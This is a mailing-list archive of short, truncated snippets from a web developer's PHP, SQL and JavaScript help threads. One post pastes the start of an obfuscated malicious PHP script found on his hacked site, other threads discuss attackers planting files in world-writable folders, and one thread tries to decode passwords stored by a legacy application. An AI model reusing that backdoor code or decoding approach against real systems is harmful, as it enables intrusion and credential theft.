Re: [wdvltalk] strange mssql problem

2008-12-08 Thread steve miller
st the db using Management Studio. You will get an error message there if there is one. Zach On Wed, Nov 19, 2008 at 10:04 AM, steve miller <[EMAIL PROTECTED]> wrote: Hi all, We are using php to connect to a local MS SQL database, and all seems to be fine. We are connecting to several t

Re: [wdvltalk] aol mail

2008-12-01 Thread steve miller
t; http://www.shefen.com/ > > steve miller wrote: >> Hi Dave. >> >> I noticed that text/html just after I sent this and changed it it >> text/plain, because I am not sending html at all. >> I have sent mail (both html and text) to the same accounts using my >> desk

Re: [wdvltalk] aol mail

2008-12-01 Thread steve miller
script is not, and not sure any of these aol users would know how to tell me what headers were received. steve On Dec 1, 2008, at 11:13 AM, David Precious wrote: > steve miller wrote: >> Sorry if this is a repeat, but I could still use some help... >> I am sending mail using

[wdvltalk] aol mail

2008-12-01 Thread steve miller
Hi all. Sorry if this is a repeat, but I could still use some help... I am sending mail using php mail(), and everyone except aol accounts are receiving it. After browsing around looking for advice, these are the headers I am sending: $mailfrom = "MIME-Version: 1.0\r\n"; $mailfrom .= "Con

Re: [wdvltalk] writeable directories

2008-11-26 Thread steve miller
wrote: Quoting steve miller <[EMAIL PROTECTED]>: Still confused on a few things: PHP uploads to a temp directory and then you need a script to move the file. In oscommerce, there is no way for someone to access the upload scripts unless they have access to the protected admin directory fir

Re: [wdvltalk] writeable directories

2008-11-26 Thread steve miller
I'll test! Sure hope it's not this easy, because it means that directory permissions are not going to stop anything :( On Nov 26, 2008, at 10:09 AM, Matthew Macdonald-Wallace wrote: Quoting steve miller <[EMAIL PROTECTED]>: Still confused on a few things: PHP uploads to

Re: [wdvltalk] writeable directories

2008-11-26 Thread steve miller
On Nov 26, 2008, at 9:42 AM, David Precious wrote: Will untrusted users be able to upload stuff, or will uploading be limited to trusted users only? If trusted users only, then, as long as the software has no silly holes in it, you should be relatively safe. Cheers Dave P This is th

Re: [wdvltalk] writeable directories

2008-11-26 Thread steve miller
On Nov 26, 2008, at 9:11 AM, Matthew Macdonald-Wallace wrote: Your best bet is to set the owner to the username your webserver runs under and the group to user. Then set the permissions to the following: 754 This gives the user full rights, the group read + execute and the world read priv

Re: [wdvltalk] writeable directories

2008-11-26 Thread steve miller
On Nov 26, 2008, at 9:18 AM, David Precious wrote: Having the permissions set to 777 means that any user who has an account on that server could write to that directory. For an attacker to upload stuff there, it's almost certainly nothing to do with the directory being word-writable, but

[wdvltalk] writeable directories

2008-11-26 Thread steve miller
Hi all. I have read a bit about having web directories that are world writeable. Some say that they are a security hole and some say they are not. I have used open source applications like oscommerce and have had several of them hacked, finding php files placed within the images directory. M

[wdvltalk] need aol mail help

2008-11-25 Thread steve miller
Hi all. I am using php and mail() to try to send text-only email responses within some scripts, but aol addresses are not receiving them. I am using simple stuff like this, with no other headers: $mailfrom="From: $super_email"; $mailto="$users[2]"; $mailsubject="Registration Re-activation"; m

Re: [wdvltalk] strange mssql problem

2008-11-20 Thread steve miller
Hi Tim, I'll check, but I'm almost positive there is a primary key because this is a main "Customer" table which identifies all the important info about the clients. steve On Nov 20, 2008, at 9:35 AM, Furry, Tim wrote: > steve wrote... > We are using php to connect to a local MS SQL data

Re: [wdvltalk] strange mssql problem

2008-11-19 Thread steve miller
I'll check on the field types and give it a whirl. thanks! On Nov 19, 2008, at 12:58 PM, Cheryl Hewitt wrote: You are using MS SQL, right? If you are using a view then you can set rights as to what the view can do (i.e. select, update, delete) for a specific user role. It is just a level of

Re: [wdvltalk] strange mssql problem

2008-11-19 Thread steve miller
things don't behave the way you'd expect. Sorry I can't help much more than that! MOU 2008/11/19 steve miller <[EMAIL PROTECTED]>: Hi all, We are using php to connect to a local MS SQL database, and all seems to be fine. We are connecting to several tables within the

[wdvltalk] strange mssql problem

2008-11-19 Thread steve miller
Hi all, We are using php to connect to a local MS SQL database, and all seems to be fine. We are connecting to several tables within the same database, and are able to insert, update, delete, etc. However, there is one table that refuses to let us update, and we can not figure out why. We

Re: [wdvltalk] url rewrite help needed

2008-10-20 Thread steve miller
Couldn't agree more, but the school is not very up on technology yet. We are actually a club of parents that support various school activities, like their music program. We run trips and things to raise money, so we are not "officially" part of the school system. The school has a basic site,

Re: [wdvltalk] url rewrite help needed

2008-10-20 Thread steve miller
OK. Thanks for the thoughts. steve On Oct 19, 2008, at 9:23 PM, Sheila Fenelon wrote: > steve miller wrote: >> Hi Sheila. >> >> Guess I'm being thick here, but wouldn't the logged in visitor >> still see >> the url to the intermediate script? >>

Re: [wdvltalk] url rewrite help needed

2008-10-19 Thread steve miller
On Oct 19, 2008, at 8:37 PM, Hassan Schroeder wrote: On Sun, Oct 19, 2008 at 4:58 PM, steve miller <[EMAIL PROTECTED]> wrote: In this way, school members log into edline first with a username and pw, then they see the link to the private site. So, I'm hoping I unde

Re: [wdvltalk] url rewrite help needed

2008-10-19 Thread steve miller
Hi Sheila. Guess I'm being thick here, but wouldn't the logged in visitor still see the url to the intermediate script? Or are you thinking it will happen so fast that they won't be able to read it? steve On Oct 19, 2008, at 8:28 PM, Sheila Fenelon wrote: steve miller

Re: [wdvltalk] url rewrite help needed

2008-10-19 Thread steve miller
Guess I need to give more info. This is a private site that the school does not want accessed via the open web. They don't have an intranet, so what we are doing is making it only available through a site that they contract (edline.net). In this way, school members log into edline first with a

Re: [wdvltalk] url rewrite help needed

2008-10-19 Thread steve miller
being very helpful. If I had server or site access (or just a helpful tech), I could do lots of things, but no luck. So, I am stuck with a simple url and I'd like to hide the variable being sent. steve On Oct 19, 2008, at 12:58 PM, Hassan Schroeder wrote: On Sun, Oct 19, 2008 at 9:10 A

[wdvltalk] url rewrite help needed

2008-10-19 Thread steve miller
Hi all. Could use some help with a url rewrite, if possible... I am sending a variable from one site to another via a url string because I don't have access to send it as a form post variable. Thus, the variable is viewable, like index.html?this=that. I'd like to hide the variable value. Is

Re: [wdvltalk] http_referer

2008-09-30 Thread steve miller
Guess I should have looked :o) There is someone else at the school who normally interacts with edline, and she said she could only add links. Guess I'll have to dig in a little... Thanks again. On Sep 30, 2008, at 12:52 PM, David Precious wrote: steve miller wrote: Kind of thoug

Re: [wdvltalk] http_referer

2008-09-30 Thread steve miller
12:37 PM, David Precious wrote: steve miller wrote: I am building a site for our school that handles signups for trips and such, and we want it to be accessible only from within another site that has a secure login. In other words, we don't want it accessible from search engine links or d

[wdvltalk] http_referer

2008-09-30 Thread steve miller
Hi all. I am building a site for our school that handles signups for trips and such, and we want it to be accessible only from within another site that has a secure login. In other words, we don't want it accessible from search engine links or direct urls. The other site (edline.com) is n

Re: [wdvltalk] hide image source

2008-08-10 Thread steve miller
On Aug 9, 2008, at 8:51 PM, David Precious wrote: So, think there is a way to do the background="image.php" kind of thing? Yep - the browser doesn't care what kind of URL you give it for the background image - if it's an URL which, when requested, returns a usable image, then it's all g

Re: [wdvltalk] hide image source

2008-08-09 Thread steve miller
Wow: simple!! Thanks!! On Aug 9, 2008, at 11:01 AM, Sheila Fenelon wrote: > steve miller wrote: >> >> So, think there is a way to do the background="image.php" kind of >> thing? >> > > Try using the complete URL for image.php, starting with http://

Re: [wdvltalk] hide image source

2008-08-09 Thread steve miller
On Aug 9, 2008, at 9:44 AM, David Precious wrote: steve miller wrote: Could use some help with hiding an image source: Doing a photographer site without flash, and trying to make it as difficult to get to a filename as possible. I have used php files to generate images using the image tag

[wdvltalk] hide image source

2008-08-09 Thread steve miller
Hi all. Could use some help with hiding an image source: Doing a photographer site without flash, and trying to make it as difficult to get to a filename as possible. I have used php files to generate images using the image tag, like , but even if I disable "right clicking" it is easy to

[wdvltalk] query help correction

2008-07-08 Thread steve miller
I'm sorry, but my last post should have said MS sql and not mysql! thanks! steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Pos

[wdvltalk] mysql query help needed

2008-07-08 Thread steve miller
I am working with an existing database table that holds user information identified by strange id strings. The id strings are created by another application, so I can not change them, but I need to be able to query the table using them as reference. Each ID is a 3 character string like:

Re: [wdvltalk] bad guys got me

2008-06-17 Thread steve miller
Thanks David. I did some reading already as Sheila suggested, and found one vulnerability that I sent on to my host. This stuff twists my stomach, but I guess is "learning the hard way"... steve On Jun 17, 2008, at 3:54 PM, David Precious wrote: > steve miller wrote: >>

Re: [wdvltalk] bad guys got me

2008-06-17 Thread steve miller
haven't done so already, you should notify your host. > > > Sheila > > > steve miller wrote: >> Hello... >> I just found a bad script on my website :( >> Can anyone here tell me what they might have stolen? >> Here is the script: >> error_reporting

[wdvltalk] bad guys got me

2008-06-17 Thread steve miller
Hello... I just found a bad script on my website :( Can anyone here tell me what they might have stolen? Here is the script: error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER ["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SE

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
sent to the old app and to the new app. steve On Sep 14, 2007, at 12:09 PM, Sheila Fenelon wrote: Can you add a field to the current table? Sheila steve miller wrote: Hi Sheila. I'll ask him but I think it's because then we have to maintain 2 tables in 2 different database

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
Sheila Fenelon wrote: steve miller wrote: The person passing the task to me is an IT person who is in charge of all security issues at the company, and he is usually very strict about confidentiality and legality. He also has all of the plain text versions of the passwords as well as the encryp

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
Jon, The all 26 a's turned up as: 0xFBFFF9F4FB1521FCFBFFF9F4FB1521FCFBFF steve On Sep 14, 2007, at 10:03 AM, Jon Haworth wrote: Hi Steve, Might I just say this could be the best Friday afternoon question ever :-) Looks like some kind of byte codes; when we enter new passwords, here

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
Jon, Here's what we found: test sequence should be is aa 0xFBFF 0xFBFF 0xFBFFF9F30xFBFFF9F4 a 0xFBFFF9F3ED0xFBFFF9F4FB ab 0xFB01 0xFB01 abb 0xFB01FA

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
Thanks Jon. I forwarded your ideas to the client and he is going to run some more tests and send me back the results. He's pretty excited! steve On Sep 14, 2007, at 10:44 AM, Jon Haworth wrote: Having done some testing... one way of interpreting your example is that it's starting with a

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
Hi Tim. Thanks for the advice! I'm not sure whether you meant that the breaking of the code might be illegal, or the accessing of the passwords. The person passing the task to me is an IT person who is in charge of all security issues at the company, and he is usually very strict about conf

Re: [wdvltalk] encryption help

2007-09-14 Thread steve miller
Nope; unfortunately it's a compiled application that the client has no access to. steve On Sep 14, 2007, at 9:13 AM, Sheila Fenelon wrote: steve miller wrote: I have a client who wants me to use the usernames/passwords in an existing database as the authentication for a ne

[wdvltalk] encryption help

2007-09-14 Thread steve miller
I have a client who wants me to use the usernames/passwords in an existing database as the authentication for a new web application (so that he doesn't have to make users enter the info into 2 places). The problem is that the passwords in the existing database are encrypted, and since I don

[wdvltalk] semi mass emailing

2007-05-18 Thread steve miller
Hi all. We have several small mail lists (about 200 addresses) that we gather from our websites to send out updates, news, etc. I store the addresses in a database and use a simple php script to cycle through them and send them out. I was having some problems with overloading the mailserver

Re: [wdvltalk] ftp help

2007-03-07 Thread steve miller
ar 7, 2007, at 4:44 PM, David Precious wrote: On Wed, 7 Mar 2007, steve miller wrote: I want to ftp the contents of a large directory from one server to another (probably 300 files @ 20MB each). I have the login and paths for both the sending server and the receiving, but I don't have telnet a

Re: [wdvltalk] ftp help

2007-03-07 Thread steve miller
ng for the command to finish. If it sits and waits then you're back to the timeout issue. On the other hand if you put it in a loop and let it spawn an ftp session for every file at once you quickly consume all the resources on the machine, and your host gets mad. Sheila http://w

Re: [wdvltalk] ftp help

2007-03-07 Thread steve miller
Kind of makes sense. I have run scripts from crons before, so that part I know how to do. The timeout issue was the problem, and it might be the server config; I'm not sure. What I was thinking was that I could run an exec within php that executes the ftp statement like on a command line, bu

Re: [wdvltalk] ftp help

2007-03-07 Thread steve miller
yes, I can cron! On Mar 7, 2007, at 10:03 AM, Sheila Fenelon wrote: steve miller wrote: Hi all. Probably a simple question for *nix people, but not for a newbie :) I want to ftp the contents of a large directory from one server to another (probably 300 files @ 20MB each). I have the login

[wdvltalk] ftp help

2007-03-07 Thread steve miller
Hi all. Probably a simple question for *nix people, but not for a newbie :) I want to ftp the contents of a large directory from one server to another (probably 300 files @ 20MB each). I have the login and paths for both the sending server and the receiving, but I don't have telnet access into t

[wdvltalk] test

2006-11-13 Thread steve miller
just testing; none of my posts are getting through • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Posts To: wdvltalk@lists.wdvl.com T

[wdvltalk] ldap

2006-11-13 Thread steve miller
(I am re-sending this because my earlier send did not show up...) Hi all. I have a very general question because I am not exactly sure what I am asking! I have a client who has a MS desktop tool that he uses to query his MS Active Directory for contact info, devices, printers, etc. We are

[wdvltalk] php ldap query

2006-11-11 Thread steve miller
Hi all. I have a very general question because I am not exactly sure what I am asking! I have a client who has a MS desktop tool that he uses to query his MS Active Directory for contact info, devices, printers, etc. We are trying to develop a web-based tool (php) to do the same thing, but

[wdvltalk] FreeMed.fax

2006-11-07 Thread steve miller
Has anyone used FreeMED.Fax before? I found the class here: http://www.koders.com/php/ fidA2080569EFAEF14668E930236385C8A68D35DBEB.aspx?s=hylafax but could not find any examples on what to send it. I am trying to run it on an OSX webserver called from within a php script. Any help would be g

Re: [wdvltalk] excel writer

2006-08-22 Thread steve miller
On Aug 22, 2006, at 10:04 AM, Peter MacGregor wrote: I simply opened an Excel spreadsheet, then selected a random cell and used 'Insert-Picture' from the menu. If you mail me off list I'll send an example - can't attach files to this! Peter Oh; I probably didn't phrase my question cor

Re: [wdvltalk] excel writer

2006-08-22 Thread steve miller
Peter, I am using the standard spreadsheet_excel_writer package, and I don't see support for jpgs; how are you doing it? steve On Aug 21, 2006, at 5:39 PM, Peter MacGregor wrote: Must be something to do with your php program - I've just dropped a couple of jpegs into the normal excel worksh

[wdvltalk] excel writer

2006-08-21 Thread steve miller
Hi all. I am creating excel spreadsheets in php using spreadsheet_excel_writer (a Pear package), which works quite well. However, now I need to insert a jpg logo file into the spreadsheet, and this only supports bitmaps. Anyone have any pointers on how to insert jpgs? Thanks, steve •

[wdvltalk] javascript form validation

2006-08-02 Thread steve miller
Greetings. I have a client who has a cart form with textboxes, radio buttons, and checkboxes with names like "OPTION|01_Name_of_school|STDDIP", etc so the cart will recognize them. However, she wants to use javascript in the page to make sure everything is filled in or selected, and I keep g

Re: [wdvltalk] midi player problem

2006-07-09 Thread steve miller
er. I wonder though if there is something on the laptop that won't let the volume be changed - I don't know too much about laptops. Sorry I can't be of more help. Riva steve miller wrote: (sorry to re-post, but still need any help possible!) I have a client who has a dell laptop

Re: [wdvltalk] midi player problem

2006-07-09 Thread steve miller
'm no expert but I would start with that and make sure that the SW Synth volume isn't set to 0. I did go to your web link and had no problem adjusting the volume on my laptop. Ann -Original Message- From: steve miller [mailto:[EMAIL PROTECTED] Sent: Sunday, July 09

[wdvltalk] midi player problem

2006-07-09 Thread steve miller
(sorry to re-post, but still need any help possible!) I have a client who has a dell laptop running IE6 with XP, and he can't change the volume on simple controllers like the one on this page: http://wdvl.internet.com/Multimedia/Sound/ Also, when I embed a hidden player and set the volume to 5

[wdvltalk] midi music in IE

2006-07-08 Thread steve miller
I have a client who has a dell laptop running IE6 with XP, and he can't change the volume on simple controllers like the one on this page: http://wdvl.internet.com/Multimedia/Sound/ Also, when I embed a hidden player and set the volume to 50%, 40%, 30%...etc, the volume on his machine does not

Re: [wdvltalk] unix help

2006-05-26 Thread steve miller
Thanks; I'll try anything because I'm really shootin' in the dark :) steve On May 26, 2006, at 1:21 PM, Sheila Fenelon wrote: steve miller wrote: I am trying to execute a shell script containing a simple tar command using a cron job, and I ain't no good at this! I c

[wdvltalk] unix help

2006-05-26 Thread steve miller
Hi all. I am trying to execute a shell script containing a simple tar command using a cron job, and I ain't no good at this! I created a file called exec_tar.sh and placed it at the web root of my website. The file contained: tar -cvf cah_web`date +"%m%d%y"`.tar -C /home/myweb/www I am att

Re: [wdvltalk] site backup

2006-04-13 Thread steve miller
... - Original Message - From: "steve miller" <[EMAIL PROTECTED]> To: Sent: Thursday, April 13, 2006 3:36 PM Subject: [wdvltalk] site backup Hi all. Getting requests for things I know nothing about! I think this falls under the category "unix": A client wa

[wdvltalk] sorry

2006-04-13 Thread steve miller
I was a little pre-mature with my last email about remote backups...sorry :( I found a great site here: http://www.hostlibrary.com/Remotebackupusingsshtarandcron-how-to.html steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED]

[wdvltalk] site backup

2006-04-13 Thread steve miller
Hi all. Getting requests for things I know nothing about! I think this falls under the category "unix": A client wants a cron set up to tar a certain directory in her website, and send it to another website on another server for backup. I think I can figure out the tar process, but is it pos

Re: [wdvltalk] submit multiple forms

2006-04-12 Thread steve miller
ID's and sends post requests for each one. http://www.php.net/curl Jonathon Smith -Original Message- From: steve miller [mailto:[EMAIL PROTECTED] Sent: Wednesday, April 12, 2006 3:59 PM To: wdvltalk@lists.wdvl.com Subject: Re: [wdvltalk] submit multiple forms Thanks Deb. I'

Re: [wdvltalk] submit multiple forms

2006-04-12 Thread steve miller
t would be a small matter of adjusting the code that parses the POST variables. Charles R King On 12 Apr 2006 at 16:41, steve miller wrote: Hi Charles. Using php at this point. Thanks, steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mai

Re: [wdvltalk] submit multiple forms

2006-04-12 Thread steve miller
Thanks Deb. I'll have to take a look at these, but I'm not sure they will work. I never know how many forms will have to be sent, as it depends on how many selections the user makes. Thanks, steve On Apr 12, 2006, at 2:05 PM, PBC Web Design wrote: At 11:25 AM 4/12/2006, you wrote: Is ther

Re: [wdvltalk] submit multiple forms

2006-04-12 Thread steve miller
Hi Charles. Using php at this point. Thanks, steve On Apr 12, 2006, at 2:19 PM, [EMAIL PROTECTED] wrote: What scripting language are you writing in? Charles On 12 Apr 2006 at 12:25, steve miller wrote: Hi all. I have a client who uses an opt-in mail list service to send out newsletters

[wdvltalk] submit multiple forms

2006-04-12 Thread steve miller
Hi all. I have a client who uses an opt-in mail list service to send out newsletters. He creates a mail list, and then provides a signup form for each list. Each signup form contains an id number for that list only, which means that a user can only sign up for one list at a time. I have crea

[wdvltalk] test

2006-03-19 Thread steve miller
this is a test..seems like my posts are not getting through... steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/ Send Your Posts To: wdvl

[wdvltalk] wits end

2006-01-09 Thread steve miller
(sorry; been trying to send this for awhile, but the list kept rejecting the styled text...) Guess what? A few blank lines at the top of the script were somehow making the script think that header info had already been sent! I emptied the page except for: header ("Location: index.html?xx=1"

Re: [wdvltalk] location: wits end

2006-01-09 Thread steve miller
mplete URLs (eg http://www.example.com/index.php) Try that and see what happens Dan -- -Original Message- From: steve miller [mailto:[EMAIL PROTECTED] Sent: 09 January 2006 16:56 To: wdvltalk@lists.wdvl.com Subject: Re: [wdvltalk] location: wits end Hi Dan. die() and exit() stop the script, but I am get

Re: [wdvltalk] location: wits end

2006-01-09 Thread steve miller
No problem. Thanks for the thoughts. On Jan 9, 2006, at 11:52 AM, Portman wrote: PLEASE DISREGARD MY LAST E-MAIL! Eek! steve miller wrote: Hi all. I am at my wits end trying to figure out why the following php does not work: switch ($no) { case "1": echo "1"

Re: [wdvltalk] location: wits end

2006-01-09 Thread steve miller
break inside switch cases but not in an if loop Also try using die(); (or exit()) directly after the header() as this prevents further script execution[1] Dan -- [1] Source: http://uk2.php.net/manual/en/function.header.php -----Original Message- From: steve miller [mailto:[EMAIL PROTECTED]

[wdvltalk] location: wits end

2006-01-09 Thread steve miller
Hi all. I am at my wits end trying to figure out why the following php does not work: switch ($no) { case "1": echo "1"; header ("Location: index.html?xx=2"); echo "2"; break; } I set $no to equal 1, and the page will not re-direct to index.html. I also tried: if($no==1) { header ("Locatio

[wdvltalk] Training advice

2005-12-22 Thread steve miller
Hello skilled ones. I have been working with a client for about a year or two as a php programmer for their web applications. Over time, one of their applications has unintentionally migrated into a rather large customer info management system (based on php/mysql), containing a lot of duplica

Re: [wdvltalk] php mail()

2005-10-28 Thread steve miller
:10 PM, R'twick Niceorgaw wrote: Steve, On Thu, 2005-10-27 at 21:19 -0400, steve miller wrote: Hi all. Could use some help with php mail(). I am using this to send email, and have having trouble getting the reply address right: $mailto="$userstuff[3]"; $mailfrom="[E

Re: [wdvltalk] php mail()

2005-10-27 Thread steve miller
Thanks! That makes some sense and gives me a good place to start. steve On Oct 27, 2005, at 9:49 PM, Mark Groen wrote: - Original Message - From: "steve miller" <> To: Sent: Thursday, October 27, 2005 6:19 PM Subject: [wdvltalk] php mail() Hi all. Could use so

[wdvltalk] php mail()

2005-10-27 Thread steve miller
Hi all. Could use some help with php mail(). I am using this to send email, and have having trouble getting the reply address right: $mailto="$userstuff[3]"; $mailfrom="[EMAIL PROTECTED]"; $mailsubject="A status change on one of your layouts"; $mailbody="email stuff here"; mail($mailto,$mails

Re: [wdvltalk] create Outlook task using php

2005-10-06 Thread steve miller
Thanks! On Oct 6, 2005, at 9:53 AM, Mark Groen wrote: - Original Message - To: Sent: Thursday, October 06, 2005 6:37 AM Subject: RE: [wdvltalk] create Outlook task using php Does anyone have any good sources for how to create/manipulate Outlook tasks using php? I doubt it since

Re: [wdvltalk] permissions help

2005-10-06 Thread steve miller
Thanks Sheila. I don't think they actually got to the upload script; I think they somehow found the open directory and posted the program directly. I'll check into .htaccess. steve On Oct 6, 2005, at 7:46 AM, Sheila Fenelon wrote: steve miller wrote: Patrick, The php scripts r

[wdvltalk] create Outlook task using php

2005-10-06 Thread steve miller
Does anyone have any good sources for how to create/manipulate Outlook tasks using php? Thanks • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.html/

Re: [wdvltalk] permissions help

2005-10-06 Thread steve miller
Patrick, The php scripts run as "www" on the webserver, but the directories are owned by "steve" and I believe that group is "wheel". I don't really have access to be able to change all the file owners. The problem is that I need "www" to have "write" permission, which means that the whole web

[wdvltalk] permissions help

2005-10-05 Thread steve miller
Hi all. I have several websites that have php upload scripts to allow a client to update photos on their sites. I upload the images, then copy them to appropriate directories from where they are served. I seem to have to set the permissions on these directories to 777 in order to get the imag

Re: [wdvltalk] refresh a php page

2005-04-17 Thread steve miller
Gotcha. steve On Apr 17, 2005, at 5:40 PM, Stephen Caudill wrote: A page load is always a GET request. By adding the true parameter tothe reload method, you're simply forcing the browser to retrieve afresh copy of the page from the server rather than reloading thecache. - Stephen • The WD

Re: [wdvltalk] refresh a php page

2005-04-17 Thread steve miller
Thanks Stephen. The original page uses POST to send the variables. Is there a way to force a new HTTP POST instead of a GET? steve On Apr 16, 2005, at 8:46 PM, Stephen Caudill wrote: Steve, the reload method takes a parameter that forces a new HTTP GET...Typically you should only use this if th

[wdvltalk] refresh a php page

2005-04-16 Thread steve miller
I have a page that is loaded/created using variables sent to it from a previous page. On this page is a link to pop up another window, and I want to refresh the opener page when the popup is closed. I can get the page to refresh with onunload=window.opener.reload(), but the reloaded page is all

[wdvltalk] nevermind

2005-04-14 Thread steve miller
Please ignore my earlier post about resizing windows...now it works with resizeble=yes...go figure! steve • The WDVL Discussion List from WDVL.COM • To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or use the web interface http://e-newsletters.internet.com/discussionlists.ht

[wdvltalk] open window help

2005-04-14 Thread steve miller
I am using a pretty simple open window javascript like: cwindow=window.open('create_census_excel_code.html','', 'height=600,width=800,toolbar=0,menubar=0,location=0,directories=0,scrol lbars=1,resizeable=yes,left=10,top=10'); but IE6 Win won't open the window resizeable. I have tried resizeab

[wdvltalk] Created Excel files

2005-03-10 Thread steve miller
Hi all. I have created an Excel file using PEAR's Excel Writer. If I save the file to my web root (linux) and download it, it is fine. If I send the same file to my desktop using the browser, it is all garbled. Examples are here: http://www.dinnys.com/good.xls and http://www.dinnys.com/bad.xls.

Re: [wdvltalk] javascript help

2005-03-09 Thread steve miller
). Stephen Caudill wrote: Steve, I don't get a script error in IE or FF. It works in IE(6) fine for me, but FF does not. Looking at your script, in the function tallyUp(), you may try changing your element acquisition to use an eval... instead of: while (document.getElementById("single

Re: [wdvltalk] javascript help

2005-03-09 Thread steve miller
rSingle); This forces the browser to evaluate your derived variable, which should get FF stepping in line. Of course to be able to eval it, you'll have to move your control logic to the end of the loop, which is what a do...while is good for. hth, Stephen steve miller wrote: Howard, Cou

Re: [wdvltalk] javascript help

2005-03-09 Thread steve miller
r to be more sophisticated, make an array of your form object names so that you can loop through that and in each iteration run this while loop. steve miller wrote: Hi all. Could use some help with javascript. I am loading up a page with a variable number of columns depending on selections made on

Re: [wdvltalk] javascript help

2005-03-09 Thread steve miller
nt.getElementById("single" + i).value); i += 1; } Repeat as necessary. Or to be more sophisticated, make an array of your form object names so that you can loop through that and in each iteration run this while loop. steve miller wrote: Hi all. Could use some help with javascript. I

Re: [wdvltalk] javascript help

2005-03-08 Thread steve miller
i += 1; } Repeat as necessary. Or to be more sophisticated, make an array of your form object names so that you can loop through that and in each iteration run this while loop. steve miller wrote: Hi all. Could use some help with javascript. I am loading up a page with a variable number of colu

Re: [wdvltalk] javascript help

2005-03-08 Thread steve miller
= 25 8 family = 30 Total Monthly = 445 I can find no mathematic correlation between any of those numbers. Am I missing something? - stephen steve miller wrote: Stephen, I just put up the same page but with some inputted numbers in the 2nd and 3rd cols to make it a little more clear. I need t

Re: [wdvltalk] javascript help

2005-03-08 Thread steve miller
example page posted? - Stephen steve miller wrote: Hi all. Could use some help with javascript. I am loading up a page with a variable number of columns depending on selections made on a previous screen. Each column contains identical textboxes which have identical names so php will deal with

Re: [wdvltalk] javascript help

2005-03-08 Thread steve miller
"Total Monthly". Make sense? steve On Mar 8, 2005, at 5:06 PM, Stephen Caudill wrote: Got an example page posted? - Stephen steve miller wrote: Hi all. Could use some help with javascript. I am loading up a page with a variable number of columns depending on selections made on a previ

[wdvltalk] javascript help

2005-03-08 Thread steve miller
Hi all. Could use some help with javascript. I am loading up a page with a variable number of columns depending on selections made on a previous screen. Each column contains identical textboxes which have identical names so php will deal with them as arrays (like singles[], parents[], children[]

  1   2   3   >